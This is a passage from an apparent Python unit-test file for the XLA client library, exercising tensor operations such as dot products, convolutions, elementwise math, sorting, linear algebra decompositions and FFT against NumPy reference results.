expected = x.view(dst_dtype)
self.assertEqual(result[0].shape, expected.shape)
self.assertEqual(result[0].dtype, expected.dtype)
np.testing.assert_equal(result[0], expected)
# TODO(b/123523486) implement AllToAll on CPU
def DISABLED_testAllToAllOneReplica(self):
samples = [
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples[:1]:
c = self._NewComputation()
ops.AllToAll(ops.Constant(c, lhs), 0, 0)
self._ExecuteAndCompareExact(c, expected=[lhs])
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
ops.CrossReplicaSum(ops.Constant(c, lhs))
self._ExecuteAndCompareExact(c, expected=[lhs])
def testReplicaId(self):
c = self._NewComputation()
_ = ops.ReplicaId(c)
self._ExecuteAndCompareExact(c, expected=[0])
def testCrossReplicaSumOneReplicaWithSingletonGroup(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
ops.CrossReplicaSum(
ops.Constant(c, lhs), xla_client.make_replica_groups([[0]]))
self._ExecuteAndCompareExact(c, expected=[lhs])
# TODO(phawkins): np.dot implementation doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDotMatrixVector(self, dtype):
c = self._NewComputation()
lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
rhs = np.array([[10.0], [20.0]], dtype=dtype)
ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])
# TODO(phawkins): np.dot implementation doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDotMatrixMatrix(self, dtype):
c = self._NewComputation()
lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
rhs = np.array([[10.0, 20.0], [100.0, 200.0]], dtype=dtype)
ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.make_dot_dimension_numbers(
(([2], [1]), ([0], [0])))
ops.DotGeneral(
ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
ops.DotGeneral(
ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testDotGeneralWithPrecisionConfig(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.make_dot_dimension_numbers(
(([2], [1]), ([0], [0])))
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGH)
config.operand_precision.append(config.Precision.HIGHEST)
ops.DotGeneral(
ops.Constant(c, lhs),
ops.Constant(c, rhs),
dimension_numbers,
precision_config=config)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
ops.ConvGeneralDilated(
ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testConvGeneralDilatedF32WithPrecisionConfig(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGHEST)
config.operand_precision.append(config.Precision.DEFAULT)
ops.ConvGeneralDilated(
ops.Constant(c, lhs),
ops.Constant(c, rhs),
strides,
pads,
lhs_dilation,
rhs_dilation,
dimension_numbers,
precision_config=config)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NHWC", "OIHW", "CWNH"), 2)
ops.ConvGeneralDilated(
ops.Constant(c, np.transpose(lhs,
(0, 2, 3, 1))), ops.Constant(c, rhs),
strides, pads, lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[[0., 0., 0.], [10., 20., 0.], [0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(
c, expected=[np.transpose(result, (1, 3, 0, 2))])
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
feature_group_count = 2
ops.ConvGeneralDilated(
ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
lhs_dilation, rhs_dilation, dimension_numbers, feature_group_count)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
], [
[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
ops.Not(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[~arr])
def testPopulationCount(self):
c = self._NewComputation()
arr = NumpyArrayS32([3, 0, 1])
ops.PopulationCount(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.array([2, 0, 1])])
def testCountLeadingZeros(self):
c = self._NewComputation()
arr = NumpyArrayS32([0x7FFF, 0x12345678])
ops.Clz(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[[17, 3]])
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Exp(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.exp(arr)])
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Expm1(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.expm1(arr)])
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Round(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.round(arr)])
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Log(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.log(arr)])
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Log1p(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.log1p(arr)])
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Neg(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[-arr])
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Floor(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.floor(arr)])
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Ceil(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.ceil(arr)])
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
ops.Abs(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.abs(arr)])
def testTanhF32(self):
c = self._NewComputation()
arr = NumpyArrayF32([-0.2, 3.3, 12.1, 0.1, 0.0001])
ops.Tanh(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)])
def testTanhF64(self):
if self.backend.platform == "tpu":
self.skipTest("TPU doesn't support 64bit tanh")
c = self._NewComputation()
arr = NumpyArrayF64([-0.2, 3.3, 12.1, 0.1, 0.0001])
ops.Tanh(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)], rtol=1e-12)
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
ops.Transpose(ops.Constant(c, array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=[expected])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
ops.Eq(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])
def testNe(self):
c = self._NewComputation()
ops.Ne(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[[True, False, False, True]])
ops.Ne(
ops.Constant(c, NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
ops.Constant(c, NumpyArrayF32([2.0, -0.0, 1.0,
float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose,
c, (),
expected=[[True, False, True, True]])
def testGt(self):
c = self._NewComputation()
ops.Gt(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[False, True, True, False, False]])
def testGe(self):
c = self._NewComputation()
ops.Ge(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[True, True, True, False, False]])
def testLt(self):
c = self._NewComputation()
ops.Lt(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[False, False, False, True, True]])
def testLe(self):
c = self._NewComputation()
ops.Le(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[True, False, False, True, True]])
def testMax(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[[1.0, 2.0, 3.0, 7.0, 12.0]])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(
c, expected=[[[3, 3, 3], [4, 5, 6], [7, 8, 9]]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(
c, expected=[[[3, 4, 5], [4, 5, 6], [7, 8, 9]]])
def testMin(self):
c = self._NewComputation()
ops.Min(
ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[[1.0, 0.0, 2.0, 4.0, 9.0]])
def testPad(self):
c = self._NewComputation()
ops.Pad(
ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
ops.Constant(c, NumpyArrayF32(0.0)),
xla_client.make_padding_config([(1, 2, 1), (0, 1, 0)]))
self._ExecuteAndCompareClose(
c,
expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = xla_client.PaddingConfigDimension()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
padding_config.dimensions.append(dimension)
ops.Pad(
ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
ops.Constant(c, NumpyArrayF32(0.0)), padding_config)
self._ExecuteAndCompareClose(
c,
expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])
def testReshape(self):
c = self._NewComputation()
ops.Reshape(
ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [4, 5, 6]]])
def testCollapse(self):
c = self._NewComputation()
ops.Collapse(
ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3, 4], [5, 6, 7, 8]]])
def testRev(self):
c = self._NewComputation()
ops.Rev(
ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[[6, 5], [8, 7]], [[2, 1], [4, 3]]]])
def testReducePrecision(self):
c = self._NewComputation()
ops.ReducePrecision(
ops.Constant(c, NumpyArrayF32([float.fromhex("0x1.32fffep-3")])),
exponent_bits=8,
mantissa_bits=7)
self._ExecuteAndCompareClose(c, expected=[[float.fromhex("0x1.32p-3")]])
def testClampF32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayF32(-1)),
ops.Constant(c, NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testClampS32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayS32(-1)),
ops.Constant(c, NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testSelect(self):
c = self._NewComputation()
ops.Select(
ops.Constant(c, NumpyArrayBool([True, False, False, True, False])),
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 5])),
ops.Constant(c, NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[[1, -2, -3, 4, -5]])
def testSlice(self):
c = self._NewComputation()
ops.Slice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[1, 0], [3, 2], [1, 1])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
def testSliceInDim(self):
c = self._NewComputation()
ops.SliceInDim(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[[2], [5], [8]]])
ops.SliceInDim(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [7, 8, 9]]])
def testDynamicSlice(self):
c = self._NewComputation()
ops.DynamicSlice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[ops.Constant(c, NumpyArrayS32([1, 0]))], [2, 2])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
ops.DynamicUpdateSlice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4]])),
[ops.Constant(c, NumpyArrayS32([1, 1]))])
self._ExecuteAndCompareExact(
c, expected=[[[1, 2, 3], [4, 1, 2], [7, 3, 4]]])
def testTuple(self):
c = self._NewComputation()
ops.Tuple(c, [
ops.Constant(c, np.int32(42)),
ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
ops.Constant(c, NumpyArrayBool([True, False, False, True]))
])
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 3)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
ops.GetTupleElement(
ops.Tuple(c, [
ops.Constant(c, np.int32(42)),
ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
ops.Constant(c, NumpyArrayBool([True, False, False, True]))
]), 1)
self._ExecuteAndCompareClose(c, expected=[[1.0, 2.0]])
def testBroadcast(self):
c = self._NewComputation()
ops.Broadcast(
ops.Constant(c, NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]]])
def testBroadcastInDim(self):
c = self._NewComputation()
ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[[1, 1], [2, 2]]])
ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[[1, 2], [1, 2]]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
ops.RngNormal(
ops.Constant(c, NumpyArrayF32(0.)),
ops.Constant(c, NumpyArrayF32(1.)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape and uniqueness
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertLen(np.unique(result[0]), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
ops.RngUniform(
ops.Constant(c, NumpyArrayF32(lo)),
ops.Constant(c, NumpyArrayF32(hi)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape, uniqueness, and range
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertLen(np.unique(result[0]), np.prod(shape))
self.assertTrue(np.all(lo <= result[0]))
self.assertTrue(np.all(result[0] < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
ops.RngUniform(
ops.Constant(c, NumpyArrayS32(lo)),
ops.Constant(c, NumpyArrayS32(hi)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.S32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape, integrality, and range
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertEqual(result[0].dtype, np.int32)
self.assertTrue(np.all(lo <= result[0]))
self.assertTrue(np.all(result[0] < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
ops.Cholesky(ops.Constant(c, np.tril(np.dot(l, l.T))))
self._ExecuteAndCompareClose(c, expected=[l], rtol=1e-4)
def testSort(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
c = self._NewComputation()
ops.Sort(c, [ops.Constant(c, keys)], is_stable=True)
self._ExecuteAndCompareClose(
c,
expected=[np.array([[1, 2, 3, 4], [1, 2, 3, 4]], dtype=np.float32)])
def testSortKeyVal(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
ops.Sort(c, (ops.Constant(c, keys), ops.Constant(c, values)), dimension=0)
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_allclose(result[0], [[2, 1, 1, 2], [3, 4, 4, 3]])
np.testing.assert_equal(result[1], [[0, 5, 2, 7], [4, 1, 6, 3]])
def testSortCustomComparator(self):
b = self._NewComputation("comparator")
p0 = ops.Parameter(b, 0, xla_client.shape_from_pyval(NumpyArrayF32(0)))
q0 = ops.Parameter(b, 1, xla_client.shape_from_pyval(NumpyArrayF32(0)))
p1 = ops.Parameter(b, 2, xla_client.shape_from_pyval(NumpyArrayS32(0)))
q1 = ops.Parameter(b, 3, xla_client.shape_from_pyval(NumpyArrayS32(0)))
ops.Or(ops.Lt(p0, q0), ops.And(ops.Eq(p0, q0), ops.Gt(p1, q1)))
comparator = b.build()
keys = np.array([[2, 3, 1, 3], [3, 1, 2, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
ops.Sort(
c, (ops.Constant(c, keys), ops.Constant(c, values)),
dimension=1,
comparator=comparator)
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_allclose(result[0], [[1, 2, 3, 3], [1, 2, 2, 3]])
np.testing.assert_equal(result[1], [[2, 0, 3, 1], [5, 7, 6, 4]])
def testQR(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
ops.Tuple(c, ops.QR(ops.Constant(c, a), full_matrices=True))
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testEigh(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
a = (a + a.T) / 2
c = self._NewComputation()
ops.Tuple(c, ops.Eigh(ops.Constant(c, a), lower=True))
# TODO(b/129396575): Turn this test back on when it passes without
# fastmath.
# v, w = self._Execute(c, ())
# self.assertLess(np.linalg.norm(np.dot(a, v) - w * v), 1e-3)
def testSVD(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
ops.Tuple(c, ops.SVD(ops.Constant(c, a)))
u, d, v = self._Execute(c, ())
self.assertLess(np.linalg.norm(a - np.matmul(u * d, v.T)), 1e-3)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
ops.TriangularSolve(
ops.Constant(c, a_vals),
ops.Constant(c, b_vals),
left_side=False,
lower=True,
transpose_a=ops.TriangularSolveOptions_Transpose.TRANSPOSE,
unit_diagonal=False)
self._ExecuteAndCompareClose(
c,
expected=[
np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
],
dtype=np.float32)
],
rtol=1e-4)
def testApproxTopK(self):
if self.backend.platform != "tpu":
self.skipTest("ApproxTopK is only supported on TPU")
k = 10
qy_size = 256
db_size = 3000
feature = 128
recall_target = 0.95
b = self._NewComputation()
p0 = ops.Parameter(b, 0, xla_client.shape_from_pyval(NumpyArrayF32(0)))
q0 = ops.Parameter(b, 1, xla_client.shape_from_pyval(NumpyArrayF32(0)))
ops.Parameter(b, 2, xla_client.shape_from_pyval(NumpyArrayS32(0)))
ops.Parameter(b, 3, xla_client.shape_from_pyval(NumpyArrayS32(0)))
ops.Gt(p0, q0)
comparator = b.build()
qy_shape = [qy_size, feature]
db_shape = [feature, db_size]
rng = np.random.RandomState(0)
qy_arg = rng.randn(*qy_shape).astype(np.float32)
db_arg = rng.randn(*db_shape).astype(np.float32)
b = self._NewComputation()
qy = ops.Parameter(b, 0, xla_client.shape_from_pyval(qy_arg))
db = ops.Parameter(b, 1, xla_client.shape_from_pyval(db_arg))
scores = ops.Dot(qy, db)
iota = ops.Iota(
b,
xla_client.Shape.array_shape(xla_client.PrimitiveType.S32,
(qy_size, db_size)), 1)
init_val = ops.Constant(b, np.float32(-1))
init_arg = ops.Constant(b, np.int32(-1))
ground_truth = ops.TopK(scores, k=k)
approx_topk = ops.ApproxTopK(
b, [scores, iota], [init_val, init_arg],
top_k=k,
reduction_dim=1,
comparator=comparator,
recall_target=recall_target)
ops.Tuple(b, [
ops.GetTupleElement(ground_truth, 1),
ops.GetTupleElement(approx_topk, 1)
])
results = self._Execute(b, [qy_arg, db_arg])
ground_truth_docids = [set(x) for x in results[0]]
hits = sum(
len(
list(x
for x in approx_topk_per_q
if x in ground_truth_docids[q]))
for q, approx_topk_per_q in enumerate(results[1]))
self.assertGreater(hits / (qy_size * k), recall_target)
def testIsConstant(self):
c = self._NewComputation()
a = ops.Constant(c, np.int32(3))
b = ops.Constant(c, np.int32(1))
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayS32(0)))
const_expr = ops.Sub(b, a)
non_const_expr = ops.Mul(const_expr, x)
self.assertTrue(c.is_constant(const_expr))
self.assertFalse(c.is_constant(non_const_expr))
def testGather(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
indices = np.array([[[0, 2], [2, 1]], [[1, 2], [2, 0]]], dtype=np.int32)
dnums = xla_client.GatherDimensionNumbers()
dnums.offset_dims.append(1)
dnums.offset_dims.append(2)
dnums.start_index_map.append(0)
dnums.start_index_map.append(1)
dnums.index_vector_dim = 2
c = self._NewComputation()
ops.Gather(
ops.Constant(c, a),
ops.Constant(c, indices),
dnums,
slice_sizes=[1, 1])
g, = self._Execute(c, ())
expected = np.array([[[[2, 7]]], [[[5, 6]]]], dtype=np.int32)
np.testing.assert_allclose(g, expected, rtol=1e-4)
def testFft(self):
if self.backend.platform == "tpu":
self.skipTest("TPU only supports 1D FFT")
shape = [2, 3, 4, 5]
rng = np.random.RandomState(0)
a = rng.randn(*shape) + 1.0j * rng.randn(*shape)
a = a.astype(np.complex64)
# FFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.FFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.fftn(a, axes=(1, 2, 3))], rtol=1e-4)
# IFFT
c = self._NewComputation()
